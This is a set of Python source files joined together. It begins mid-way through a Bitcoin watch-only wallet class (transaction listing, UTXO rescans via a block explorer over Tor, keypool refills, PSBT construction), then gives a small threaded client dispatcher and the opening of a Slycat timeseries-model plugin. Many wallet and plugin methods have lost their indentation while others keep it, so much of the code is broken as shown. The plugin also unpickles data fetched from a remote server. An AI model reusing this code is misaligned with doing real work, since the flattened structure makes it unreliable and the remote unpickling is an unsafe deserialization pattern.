            rpc_txs = self.rpc.listtransactions("*", wallet_tx_batch + 2, wallet_tx_batch * idx, True) # get batch + 2 to make sure you have information about send
            rpc_txs.reverse()
            transactions = rpc_txs[:wallet_tx_batch]
        except:
            return []
        result = []
        blocks = {}
        for tx in transactions:
            if 'confirmations' not in tx:
                tx['confirmations'] = 0
            if len([_tx for _tx in rpc_txs if (_tx['txid'] == tx['txid'] and _tx['address'] == tx['address'])]) > 1:
                continue # means the tx is duplicated (change), continue
            tx['validated_blockhash'] = "" # default is assume unvalidated
            if validate_merkle_proofs is True and tx['confirmations'] > 0 and tx.get('blockhash'):
                proof_hex = self.rpc.gettxoutproof([tx['txid']], tx['blockhash'])
                logger.debug(f"Attempting merkle proof validation of tx { tx['txid'] } in block { tx['blockhash'] }")
                if is_valid_merkle_proof(
                    proof_hex=proof_hex,
                    target_tx_hex=tx['txid'],
                    target_block_hash_hex=tx['blockhash'],
                    target_merkle_root_hex=None,
                ):
                    # NOTE: this does NOT guarantee this blockhash is actually in the real Bitcoin blockchain!
                    # See merkletooltip.html for details
                    logger.debug(f"Merkle proof of { tx['txid'] } validation success")
                    tx['validated_blockhash'] = tx['blockhash']
                else:
                    logger.warning(f"Attempted merkle proof validation on {tx['txid']} but failed. This is likely a configuration error but perhaps your node is compromised! Details: {proof_hex}")
            result.append(tx)
        return result
    def rescanutxo(self, explorer=None):
        """Kick off a background UTXO rescan (see _rescan_utxo_thread)."""
        t = threading.Thread(target=self._rescan_utxo_thread, args=(explorer,))
        t.start()
def export_labels(self):
labels = self.rpc.listlabels()
if "" in labels:
labels.remove("")
res = self.rpc.multi([
("getaddressesbylabel", label)
for label in labels
])
return { labels[i]: list(result['result'].keys()) for i, result in enumerate(res) }
def import_labels(self, labels):
# format:
# {
# 'label1': ['address1', 'address2'],
# 'label2': ['address3', 'address4']
# }
#
rpc_calls = [("setlabel", address, label) for label, addresses in labels.items() for address in addresses]
if rpc_calls:
self.rpc.multi(rpc_calls)
    def _rescan_utxo_thread(self, explorer=None):
        """Background worker for rescanutxo().

        Scans the txout set for this wallet's descriptors, adjusts derivation
        indexes to what was found, then re-imports every found UTXO as pruned
        funds; raw transactions missing on the node are fetched from
        *explorer* (routed over a local Tor SOCKS proxy when reachable).
        """
        # rescan utxo is pretty fast,
        # so we can check large range of addresses
        # and adjust keypool accordingly
        args = [
            "start",
            [{
                "desc": self.recv_descriptor,
                "range": max(self.keypool, 1000)
            },{
                "desc": self.change_descriptor,
                "range": max(self.change_keypool, 1000)
            }]
        ]
        unspents = self.rpc.scantxoutset(*args)["unspents"]
        # if keypool adjustments fails - not a big deal
        try:
            # check derivation indexes in found unspents (last 2 indexes in [brackets])
            derivations = [tx["desc"].split("[")[1].split("]")[0].split("/")[-2:]
                           for tx in unspents]
            # get max derivation for change and receive branches
            max_recv = max([-1]+[int(der[1]) for der in derivations if der[0] == '0'])
            max_change = max([-1]+[int(der[1]) for der in derivations if der[0] == '1'])
            updated = False
            if max_recv >= self.address_index:
                # skip to max_recv
                self.address_index = max_recv
                # get next
                self.getnewaddress(change=False, save=False)
                updated = True
            while max_change >= self.change_index:
                # skip to max_change
                self.change_index = max_change
                # get next
                self.getnewaddress(change=True, save=False)
                updated = True
            # save only if needed
            if updated:
                self.save_to_file()
        except Exception as e:
            logger.warning(f"Failed to get derivation path from utxo transaction: {e}")
        # keep working with unspents
        res = self.rpc.multi([
            ("getblockhash", tx["height"])
            for tx in unspents
        ])
        block_hashes = [r["result"] for r in res]
        for i, tx in enumerate(unspents):
            tx["blockhash"] = block_hashes[i]
        res = self.rpc.multi([
            ("gettxoutproof", [tx["txid"]], tx["blockhash"])
            for tx in unspents
        ])
        proofs = [r["result"] for r in res]
        for i, tx in enumerate(unspents):
            tx["proof"] = proofs[i]
        res = self.rpc.multi([
            ("getrawtransaction", tx["txid"], False, tx["blockhash"])
            for tx in unspents
        ])
        raws = [r["result"] for r in res]
        for i, tx in enumerate(unspents):
            tx["raw"] = raws[i]
        # pruned nodes may not have the raw tx -- those must come from the explorer
        missing = [tx for tx in unspents if tx["raw"] is None]
        existing = [tx for tx in unspents if tx["raw"] is not None]
        self.rpc.multi([
            ("importprunedfunds", tx["raw"], tx["proof"])
            for tx in existing
        ])
        # handle missing transactions now
        # if Tor is running, requests will be sent over Tor
        if explorer is not None:
            try:
                requests_session = requests.Session()
                requests_session.proxies['http'] = 'socks5h://localhost:9050'
                requests_session.proxies['https'] = 'socks5h://localhost:9050'
                requests_session.get(explorer)
            except Exception:
                requests_session = requests.Session()
            # make sure there is no trailing /
            explorer = explorer.rstrip("/")
            try:
                # get raw transactions
                raws = [requests_session.get(
                            f"{explorer}/api/tx/{tx['txid']}/hex"
                        ).text
                        for tx in missing]
                # get proofs
                proofs = [requests_session.get(
                            f"{explorer}/api/tx/{tx['txid']}/merkleblock-proof"
                          ).text
                          for tx in missing]
                # import funds
                self.rpc.multi([
                    ("importprunedfunds", raws[i], proofs[i])
                    for i in range(len(raws))
                ])
            except Exception as e:
                logger.warning(f"Failed to fetch data from block explorer: {e}")
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if "scanning" not in self.info or self.info["scanning"] == False:
return None
else:
return self.info["scanning"]["progress"]
    @property
    def blockheight(self):
        """Earliest block height relevant to this wallet (used for rescans).

        Pages through listtransactions to reach the oldest batch, then
        derives a height from the oldest tx's confirmations with a 101-block
        margin (coinbase maturity); falls back to the current tip when the
        wallet has no transactions.
        """
        txs = self.rpc.listtransactions("*", 100, 0, True)
        i = 0
        while (len(txs) == 100):
            i += 1
            next_txs = self.rpc.listtransactions("*", 100, i * 100, True)
            if (len(next_txs) > 0):
                txs = next_txs
            else:
                break
        current_blockheight = self.rpc.getblockcount()
        if len(txs) > 0 and 'confirmations' in txs[0]:
            blockheight = current_blockheight - txs[0]['confirmations'] - 101 # To ensure coinbase transactions are indexed properly
            return 0 if blockheight < 0 else blockheight # To ensure regtest don't have negative blockheight
        return current_blockheight
    @property
    def account_map(self):
        """JSON string for wallet-import tooling (label, blockheight, descriptor).

        NOTE(review): built by string concatenation; the .replace("'", "\\'")
        escaping looks suspicious for strict JSON (single quotes need no
        escaping there) -- confirm consumers before changing.
        """
        return '{ "label": "' + self.name.replace("'","\\'") + '", "blockheight": ' + str(self.blockheight) + ', "descriptor": "' + self.recv_descriptor.replace("/", "\\/") + '" }'
def getnewaddress(self, change=False, save=True):
label = "Change" if change else "Address"
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
self.setlabel(address, "{} #{}".format(label, index))
if change:
self.change_address = address
else:
self.address = address
if save:
self.save_to_file()
return address
    def get_address(self, index, change=False, check_keypool=True):
        """Derive address *index* on the receive (or change) branch.

        Tops up the Core keypool when the index approaches its end, and
        falls back to a manually sorted descriptor for nodes that don't
        support sortedmulti.
        """
        if check_keypool:
            pool = self.change_keypool if change else self.keypool
            if pool < index + self.GAP_LIMIT:
                self.keypoolrefill(pool, index + self.GAP_LIMIT, change=change)
        desc = self.change_descriptor if change else self.recv_descriptor
        if self.is_multisig:
            try:
                # first try with sortedmulti
                addr = self.rpc.deriveaddresses(desc, [index, index+1])[0]
            except Exception:
                # if sortedmulti is not supported
                desc = sort_descriptor(
                    self.rpc,
                    desc,
                    index=index,
                    change=change
                )
                addr = self.rpc.deriveaddresses(desc)[0]
            return addr
        return self.rpc.deriveaddresses(desc, [index, index + 1])[0]
    def get_descriptor(self, index=None, change=False, address=None):
        """
        Returns address descriptor from index, change
        or from address belonging to the wallet.

        When *address* is given, its branch and index are recovered from the
        node's hdkeypath; otherwise the wallet's current index is used.
        """
        if address is not None:
            d = self.rpc.getaddressinfo(address)['desc']
            # hdkeypath-style suffix inside [brackets]: .../<branch>/<index>
            path = d.split("[")[1].split("]")[0].split("/")
            change = bool(int(path[-2]))
            index = int(path[-1])
        if index is None:
            index = self.change_index if change else self.address_index
        desc = self.change_descriptor if change else self.recv_descriptor
        desc = desc.split("#")[0]
        return AddChecksum(desc.replace("*",f"{index}"))
def get_balance(self):
try:
self.balance = self.rpc.getbalances()["watchonly"]
except:
self.balance = { "trusted": 0, "untrusted_pending": 0 }
return self.balance
    def keypoolrefill(self, start, end=None, change=False):
        """Import descriptor addresses [start, end) into the Core keypool.

        Uses importmulti on the (sorted)multi descriptor; on nodes without
        sortedmulti support, falls back to importing one manually sorted
        descriptor per index (BIP67). Labels every imported address and
        persists the new keypool size. Returns *end*.
        """
        if end is None:
            end = start + self.GAP_LIMIT
        desc = self.recv_descriptor if not change else self.change_descriptor
        args = [
            {
                "desc": desc,
                "internal": change,
                "range": [start, end],
                "timestamp": "now",
                "keypool": True,
                "watchonly": True
            }
        ]
        if not self.is_multisig:
            r = self.rpc.importmulti(args, {"rescan": False})
        # bip67 requires sorted public keys for multisig addresses
        else:
            # try if sortedmulti is supported
            r = self.rpc.importmulti(args, {"rescan": False})
            # doesn't raise, but instead returns "success": False
            if not r[0]['success']:
                # first import normal multi
                # remove checksum
                desc = desc.split("#")[0]
                # switch to multi
                desc = desc.replace("sortedmulti", "multi")
                # add checksum
                desc = AddChecksum(desc)
                # update descriptor
                args[0]["desc"] = desc
                r = self.rpc.importmulti(args, {"rescan": False})
                # make a batch of single addresses to import
                arg = args[0]
                # remove range key
                arg.pop("range")
                batch = []
                for i in range(start, end):
                    sorted_desc = sort_descriptor(
                        self.rpc,
                        desc,
                        index=i,
                        change=change
                    )
                    # create fresh object
                    obj = {}
                    obj.update(arg)
                    obj.update({"desc": sorted_desc})
                    batch.append(obj)
                r = self.rpc.importmulti(batch, {"rescan": False})
        if change:
            self.change_keypool = end
        else:
            self.keypool = end
        self.rpc.multi([
            (
                "setlabel",
                self.get_address(i, change=change, check_keypool=False),
                "{} #{}".format(
                    "Change" if change else "Address", i
                )
            )
            for i in range(start, end)
        ])
        self.save_to_file()
        return end
def utxo_on_address(self, address):
utxo = [tx for tx in self.utxo if tx["address"] == address]
return len(utxo)
def balance_on_address(self, address):
balancelist = [utxo["amount"] for utxo in self.utxo if utxo["address"] == address]
return sum(balancelist)
def utxo_on_label(self, label):
return len([tx for tx in self.utxo if self.utxo_labels_list[tx["address"]] == label])
def balance_on_label(self, label):
return sum(utxo["amount"] for utxo in self.utxo if self.utxo_labels_list[utxo["address"]] == label)
def addresses_on_label(self, label):
return list(dict.fromkeys(
[address for address in (self.addresses + self.change_addresses) if self.getlabel(address) == label]
))
@property
def is_current_address_used(self):
return self.balance_on_address(self.address) > 0
def utxo_addresses(self, idx=0, wallet_utxo_batch=100):
return list(
dict.fromkeys(
list(reversed([
utxo["address"] for utxo in sorted(
self.utxo, key = lambda utxo: utxo["time"]
)
]))[(wallet_utxo_batch * idx):(wallet_utxo_batch * (idx + 1))]
)
)
def utxo_labels(self, idx=0, wallet_utxo_batch=100):
return list(
dict.fromkeys(
list(reversed([
self.utxo_labels_list[utxo["address"]] for utxo in sorted(
self.utxo, key = lambda utxo: utxo["time"]
)
]))[(wallet_utxo_batch * idx):(wallet_utxo_batch * (idx + 1))]
)
)
    def setlabel(self, address, label):
        """Attach *label* to *address* in the Core wallet."""
        self.rpc.setlabel(address, label)
    def getlabel(self, address):
        """Label of a single address (the address itself when unlabeled)."""
        return self.getlabels([address])[address]
    def getlabels(self, addresses):
        """Map each address to its label, falling back to the address itself
        when no (non-empty) label is set. Handles both the pre-0.20 `label`
        field and the newer `labels` array.
        """
        labels = {}
        addresses_infos = self.rpc.multi([('getaddressinfo', address) for address in addresses])
        for address_info in addresses_infos:
            address_info = address_info['result']
            # Bitcoin Core version 0.20.0 has replaced the `label` field with `labels`, an array currently limited to a single item.
            label = address_info["labels"][0] if (
                "labels" in address_info
                and (isinstance(address_info["labels"], list)
                and len(address_info["labels"]) > 0)
                and "label" not in address_info) else address_info["address"]
            if label == "":
                label = address_info["address"]
            # legacy `label` field wins when present and non-empty
            labels[address_info["address"]] = address_info["label"] if "label" in address_info and address_info["label"] != "" else label
        return labels
def get_address_name(self, address, addr_idx):
if self.getlabel(address) == address and addr_idx > -1:
self.setlabel(address, "Address #{}".format(addr_idx))
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
    @property
    def available_balance(self):
        """Balance with amounts locked by pending PSBTs subtracted per bucket."""
        locked_utxo = self.rpc.listlockunspent()
        # copy
        balance = {}
        balance.update(self.balance)
        for tx in locked_utxo:
            tx_data = self.rpc.gettransaction(tx["txid"])
            raw_tx = self.rpc.decoderawtransaction(tx_data["hex"])
            # unconfirmed locked outputs reduce the pending bucket, confirmed the trusted one
            if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
                balance["untrusted_pending"] -= raw_tx["vout"][tx["vout"]]["value"]
            else:
                balance["trusted"] -= raw_tx["vout"][tx["vout"]]["value"]
        return balance
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def change_addresses(self):
return [self.get_address(idx, change=True) for idx in range(0, self.change_index + 1)]
    @property
    def wallet_addresses(self):
        """All known receive and change addresses."""
        return self.addresses + self.change_addresses
    def createpsbt(self, addresses:[str], amounts:[float], subtract:bool=False, subtract_from:int=0, fee_rate:float=1.0, selected_coins=[], readonly=False):
        """
        fee_rate: in sat/B or BTC/kB. If set to 0 Bitcoin Core sets feeRate automatically.

        Builds a funded PSBT paying `amounts` to `addresses`, optionally from
        `selected_coins` ("txid,vout,amount" strings), optionally subtracting
        the fee from output `subtract_from`. Unless `readonly`, the PSBT is
        stored as pending and its inputs are locked.
        NOTE(review): the mutable default `selected_coins=[]` is shared across
        calls -- safe only while callers never mutate it.
        """
        if fee_rate > 0 and fee_rate < self.MIN_FEE_RATE:
            fee_rate = self.MIN_FEE_RATE
        if self.full_available_balance < sum(amounts):
            raise SpecterError('The wallet does not have sufficient funds to make the transaction.')
        extra_inputs = []
        # spend unconfirmed change when the confirmed balance is not enough
        if self.available_balance["trusted"] < sum(amounts):
            txlist = self.rpc.listunspent(0, 0)
            b = sum(amounts) - self.available_balance["trusted"]
            for tx in txlist:
                extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
                b -= tx["amount"]
                if b < 0:
                    break
        elif selected_coins != []:
            still_needed = sum(amounts)
            for coin in selected_coins:
                coin_txid = coin.split(",")[0]
                coin_vout = int(coin.split(",")[1])
                coin_amount = float(coin.split(",")[2])
                extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
                still_needed -= coin_amount
                if still_needed < 0:
                    break
            if still_needed > 0:
                raise SpecterError("Selected coins does not cover Full amount! Please select more coins!")
        # subtract fee from amount of this output:
        # currently only one address is supported, so either
        # empty array (subtract from change) or [0]
        subtract_arr = [subtract_from] if subtract else []
        options = {
            "includeWatching": True,
            "changeAddress": self.change_address,
            "subtractFeeFromOutputs": subtract_arr
        }
        self.setlabel(self.change_address, "Change #{}".format(self.change_index))
        if fee_rate > 0:
            # bitcoin core needs us to convert sat/B to BTC/kB
            options["feeRate"] = round((fee_rate * 1000) / 1e8, 8)
        # don't reuse change addresses - use getrawchangeaddress instead
        r = self.rpc.walletcreatefundedpsbt(
            extra_inputs, # inputs
            [{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
            0, # locktime
            options, # options
            True # bip32-der
        )
        b64psbt = r["psbt"]
        psbt = self.rpc.decodepsbt(b64psbt)
        if fee_rate > 0.0:
            # second pass: re-fund with a fee rate adjusted for the estimated
            # size of the final (fully signed) transaction
            psbt_fees_sats = int(psbt['fee'] * 1e8)
            # estimate final size: add weight of inputs
            tx_full_size = ceil(psbt['tx']['vsize']
                                + len(psbt["inputs"])*self.weight_per_input/4)
            adjusted_fee_rate = fee_rate * (
                fee_rate / (psbt_fees_sats / psbt['tx']['vsize'])
            ) * (tx_full_size / psbt['tx']['vsize'])
            options["feeRate"] = '%.8f' % round((adjusted_fee_rate * 1000) / 1e8, 8)
            r = self.rpc.walletcreatefundedpsbt(
                extra_inputs, # inputs
                [{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
                0, # locktime
                options, # options
                True # bip32-der
            )
            b64psbt = r["psbt"]
            psbt = self.rpc.decodepsbt(b64psbt)
            psbt["fee_rate"] = options["feeRate"]
        # estimate full size
        tx_full_size = ceil(psbt['tx']['vsize']
                            + len(psbt["inputs"])*self.weight_per_input/4)
        psbt["tx_full_size"] = tx_full_size
        psbt['base64'] = b64psbt
        psbt["amount"] = amounts
        psbt["address"] = addresses
        psbt["time"] = time.time()
        psbt["sigs_count"] = 0
        if not readonly:
            self.save_pending_psbt(psbt)
        return psbt
    def fill_psbt(self, b64psbt, non_witness:bool=True, xpubs:bool=True):
        """Enrich a base64 PSBT with previous transactions and/or global xpubs.

        non_witness: attach each input's full previous transaction (required
        by some hardware signers); when False, strip non_witness_utxo from
        segwit inputs instead.
        xpubs: for multisig, add the cosigner xpubs (fingerprint + derivation)
        to the PSBT's global unknown map.
        """
        psbt = PSBT()
        psbt.deserialize(b64psbt)
        if non_witness:
            for i, inp in enumerate(psbt.tx.vin):
                # NOTE(review): prevout.hash serialized with to_bytes(32, 'big')
                # -- confirm this matches the txid byte order gettransaction expects
                txid = inp.prevout.hash.to_bytes(32,'big').hex()
                try:
                    res = self.rpc.gettransaction(txid)
                except:
                    raise SpecterError("Can't find previous transaction in the wallet.")
                stream = BytesIO(bytes.fromhex(res["hex"]))
                prevtx = CTransaction()
                prevtx.deserialize(stream)
                psbt.inputs[i].non_witness_utxo = prevtx
        else:
            # remove non_witness_utxo if we don't want them
            for inp in psbt.inputs:
                if inp.witness_utxo is not None:
                    inp.non_witness_utxo = None
        if xpubs:
            # for multisig add xpub fields
            if len(self.keys) > 1:
                for k in self.keys:
                    # 0x01 = PSBT_GLOBAL_XPUB key type
                    key = b'\x01' + decode_base58(k.xpub)
                    if k.fingerprint != '':
                        fingerprint = bytes.fromhex(k.fingerprint)
                    else:
                        fingerprint = get_xpub_fingerprint(k.xpub)
                    if k.derivation != '':
                        der = der_to_bytes(k.derivation)
                    else:
                        der = b''
                    value = fingerprint + der
                    psbt.unknown[key] = value
        return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.rpc.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
amount = []
address = []
# get output address and amount
for out in psbt["tx"]["vout"]:
if "addresses" not in out["scriptPubKey"] or len(out["scriptPubKey"]["addresses"]) == 0:
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.rpc.getaddressinfo(addr)
# check if it's a change
if info["iswatchonly"] or info["ismine"]:
continue
address.append(addr)
amount.append(out["value"])
# detect signatures
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.name for dev in signed_devices]
psbt["amount"] = amount
psbt["address"] = address
psbt["time"] = time.time()
psbt["sigs_count"] = len(signed_devices)
raw = self.rpc.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
self.save_pending_psbt(psbt)
return psbt
    @property
    def weight_per_input(self):
        """Calculates the weight of a signed input"""
        # NOTE(review): the numbers below are byte-size estimates (a
        # signature is assumed at its 75-byte maximum). The result is
        # consumed by the tx_full_size estimate, where it is divided by 4
        # — confirm the witness/weight accounting against BIP-141 before
        # changing any constant here.
        if self.is_multisig:
            input_size = 3 # OP_M OP_N ... OP_CHECKMULTISIG
            # pubkeys
            input_size += 34 * len(self.keys)
            # signatures
            input_size += 75 * self.sigs_required
            if not self.recv_descriptor.startswith('wsh'):
                # P2SH scriptsig: 22 00 20 <32-byte-hash>
                # scriptsig bytes are non-witness, hence counted at 4x
                input_size += 35 * 4
            return input_size
        # else: single-sig
        if self.recv_descriptor.startswith('wpkh'):
            # pubkey, signature
            return 75 + 34
        # pubkey, signature, 4* P2SH: 16 00 14 20-byte-hash
        return 75 + 34 + 23 * 4
|
thread.py | # Copyright (C) 2011 Victor Semionov
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of the contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
import logging
# Maximum number of concurrent client threads (0 = unlimited); set by configure().
_max_threads = 0
# Counting semaphore guarding the thread count; created in configure() when a limit is set.
_guard_sem = None
# Module logger; initialized in configure().
logger = None
# Capability flags describing this dispatch backend: threaded, not subprocess-based.
is_threaded = True
is_subproc = False
# Lock type matching this backend's concurrency model.
Lock = threading.Lock
def configure(config):
    """Initialize the threading backend from *config*.

    Reads the "max-clients" option (default 20); a non-zero value
    installs a counting semaphore that caps concurrent client threads.
    Also sets up the module logger.
    """
    global _max_threads, _guard_sem, logger
    limit = config.getint("max-clients", 20)
    _max_threads = limit
    if limit:
        _guard_sem = threading.Semaphore(limit)
    logger = logging.getLogger(__name__)
    logger.debug("initialized")
def thread_task(task, sock, *args):
    """Thread body: run task(sock, *args), log any uncaught exception,
    and on exit release the guard semaphore when limiting is enabled."""
    logger.debug("thread started")
    try:
        try:
            task(sock, *args)
        except Exception:
            # never let a client task kill the worker silently
            logger.exception("unhandled exception")
    finally:
        logger.debug("thread exiting")
        if _max_threads:
            _guard_sem.release()
def process(task, sock, *args):
    """Dispatch *task* on a new daemon thread, honoring the max-clients
    limit: when the semaphore is exhausted, log a warning and block
    until a running thread terminates."""
    if _max_threads:
        # try a non-blocking acquire first so we can warn before waiting
        if not _guard_sem.acquire(False):
            logger.warning("max-clients limit exceeded; waiting for a thread to terminate")
            _guard_sem.acquire()
    worker = threading.Thread(target=thread_task, args=(task, sock) + args)
    worker.daemon = True
    worker.start()
|
slycat-timeseries-model.py | # Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC . Under the terms of Contract
# DE-NA0003525 with National Technology and Engineering Solutions of Sandia, LLC, the U.S. Government
# retains certain rights in this software.
def register_slycat_plugin(context):
"""Called during startup when the plugin is loaded."""
import cherrypy
import datetime
import time
import os
import json
import slycat.web.server
import threading
import sys
import traceback
import numpy
import re
import couchdb
import statistics
import io
import tarfile
    # Prefer a C pickle implementation when available.
    # NOTE(review): module names are case-sensitive — Python 2's C module
    # was "cPickle", so "cpickle" never resolves and the stdlib "pickle"
    # fallback is always used.
    try:
        import cpickle as pickle
    except ImportError:
        import pickle
    # Background compute thread per model id (managed by pull_data/update_remote_job).
    thread_pool={}
def media_columns(database, model, verb, type, command, **kwargs):
"""
Identify columns in the input data that contain media URIs (image or video).
:param kwargs:
:param command:
:param type:
:param verb:
:param model:
model ID in the data base
:param database:
our connection to couch db
"""
expression = re.compile("file://")
search = numpy.vectorize(lambda x: bool(expression.search(x)))
columns = []
metadata = slycat.web.server.get_model_arrayset_metadata(database, model, "inputs", "0")["arrays"][0]
for index, attribute in enumerate(metadata["attributes"]):
if attribute["type"] != "string":
continue
column = slycat.web.server.get_model_arrayset_data(database, model, "inputs", "0/%s/..." % index)
if not numpy.any(search(column)):
continue
columns.append(index)
cherrypy.response.headers["content-type"] = "application/json"
return json.dumps(columns)
def finish(model_id):
"""
Update the model in the databse as successfully completed.
:param model_id: uid of the model
"""
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", model_id)
slycat.web.server.update_model(database, model, state="finished", result="succeeded",
finished=datetime.datetime.utcnow().isoformat(), progress=100, message="timeseries model finished uploading all data")
def fail_model(mid, message):
"""
Update the model as failed.
:param mid: model ID
:param message: reason for the model failure
"""
database = slycat.web.server.database.couchdb.connect()
model = database.get("model", mid)
slycat.web.server.update_model(database, model, state="finished", result="failed",
finished=datetime.datetime.utcnow().isoformat(), message=message)
def get_remote_file_server(hostname, model, filename, total_file_delta_time = [], calling_client=None):
"""
Utility function to fetch remote files.
:param hostname:
:param username:
:param filename: Full filename for the requested file
:return: tuple with session ID and file content
"""
sid = get_sid(hostname, model)
with slycat.web.server.remote.get_session(sid, calling_client) as session:
import time
start = time.time()
file = session.get_file(filename)
end = time.time()
delta_time = (end - start)
total_file_delta_time.append(delta_time)
return file
def get_sid(hostname, model):
"""
:param hostname:
:param model:
:return:
"""
sid = None
try:
database = slycat.web.server.database.couchdb.connect()
sessions = [session for session in database.scan("slycat/sessions") if
session["creator"] == model["creator"]]
if len(sessions) > 1:
cherrypy.log.error("to many user sessions %s" % str(sessions))
raise Exception("to many user sessions")
for index, host_session in enumerate(sessions[0]["sessions"]):
if host_session["hostname"] == hostname:
sid = host_session["sid"]
if(not slycat.web.server.remote.check_session(sid)):
cherrypy.log.error("error session %s SID:%s Keys %s" % (slycat.web.server.remote.check_session(sid), sid, list(slycat.web.server.remote.session_cache.keys())))
slycat.web.server.remote.delete_session(sid)
del session["sessions"][index]
database.save(session)
raise cherrypy.HTTPError("404")
break
except Exception as e:
cherrypy.log.error(traceback.format_exc())
cherrypy.log.error("Timeseries model compute exception type: %s" % sys.exc_info()[0])
cherrypy.log.error("Timeseries model compute exception value: %s" % sys.exc_info()[1])
cherrypy.log.error("Timeseries model compute exception traceback: %s" % sys.exc_info()[2])
cherrypy.log.error("could not retrieve host session for remotes %s" % e)
raise cherrypy.HTTPError("404")
if sid is None:
raise cherrypy.HTTPError("400 session is None value")
return sid
def helpGetFile(filename, use_tar, hostname, model, total_file_delta_time,calling_client, input_tar):
"""
help determin how to get a file either through
extracting from a tar file or from grabbing the file remotely
Arguments:
filename {[type]} -- file path
use_tar {[type]} -- flag for if it should use the tar
hostname {[type]} -- name of the host system
model {[type]} -- model from the DB
total_file_delta_time {[type]} -- array of file load times
calling_client {[type]} -- ip of the calling client
input_tar {[type]} -- tar file to read from
Returns:
file -- in memory file
"""
if use_tar:
return input_tar.extractfile(filename).read()
else:
return get_remote_file_server(hostname, model,
filename,
total_file_delta_time,
calling_client)
    def compute(model_id, stop_event, calling_client):
        """
        Computes the Time Series model. It fetches the necessary files
        (pickles/JSON produced by the slycat-agent-compute-timeseries.py
        script) from a remote server — preferably as one tar.gz, falling
        back to per-file pulls — and pushes them into the model.
        :param model_id: uid for the model in the database
        :param stop_event: threading.Event set when this worker finishes
            (successfully or not)
        :param calling_client: ip of the calling client
        """
        try:
            # per-file fetch durations, accumulated for the stats log below
            total_file_delta_time = []
            #cherrypy.log.error("in thread")
            # workdir += "/slycat/pickle" # route to the slycat directory
            start_time = time.time()
            database = slycat.web.server.database.couchdb.connect()
            model = database.get("model", model_id)
            model["model_compute_time"] = datetime.datetime.utcnow().isoformat()
            with slycat.web.server.get_model_lock(model["_id"]):
                database.save(model)
            slycat.web.server.update_model(database, model, state="waiting", message="starting data pull Timeseries")
            model = database.get("model", model_id)
            # job parameters recorded earlier by update_model_info
            uid = slycat.web.server.get_model_parameter(database, model, "pickle_uid")
            workdir_raw = slycat.web.server.get_model_parameter(database, model, "working_directory")
            workdir = workdir_raw + "pickle"
            hostname = slycat.web.server.get_model_parameter(database, model, "hostname")
            username = slycat.web.server.get_model_parameter(database, model, "username")
            # get an active session
            sid = get_sid(hostname, model)
            # load inputs
            slycat.web.server.update_model(database, model, progress=50, message="loading inputs")
            use_tar = True
            # keep this blank unless we need it
            pickle_path = ''
            input_tar = None
            try:
                myfiles_tar_gz = get_remote_file_server(hostname, model,
                                                        "%s/slycat_timeseries_%s/slycat-timeseries.tar.gz" % (workdir, uid),
                                                        total_file_delta_time,
                                                        calling_client)
                myfiles_tar_gz = io.BytesIO(myfiles_tar_gz)
                input_tar = tarfile.open(fileobj=myfiles_tar_gz, mode="r:gz")
            except:
                # looks like the file is too large lets just grab one file at a time
                use_tar = False
                pickle_path = "%s/slycat_timeseries_%s/" % (workdir, uid)
            inputs = helpGetFile("%sarrayset_inputs.pickle" % (pickle_path),
                                 use_tar, hostname, model, total_file_delta_time, calling_client, input_tar)
            inputs = pickle.loads(inputs)
            # Decoding potential byte strings
